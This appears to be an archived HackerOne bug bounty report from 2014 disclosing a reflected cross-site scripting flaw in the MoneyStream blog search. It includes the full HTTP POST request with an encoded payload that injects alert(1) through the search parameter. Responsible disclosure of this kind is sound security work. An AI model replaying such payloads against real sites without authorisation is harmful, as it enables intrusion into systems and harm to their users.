MoneyStream: Here is another XSS i got for you

2014-03-18T13:33:27
ID H1:4276
Type hackerone
Reporter shahmeer-amir
Modified 2014-08-06T20:33:21

Description

I ve verified it and it does trigger a JS alert POST /blog/ HTTP/1.1 Host: moneystream.com Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: https://moneystream.com/blog/ Cookie: TrackingId=d86722a7-b3fc-45a4-87c8-fac0a31cca27 Content-Type: application/x-www-form-urlencoded Content-Length: 30

s=Search%2bthis%2bwebsite%252671879%3balert(1)%2f%2f593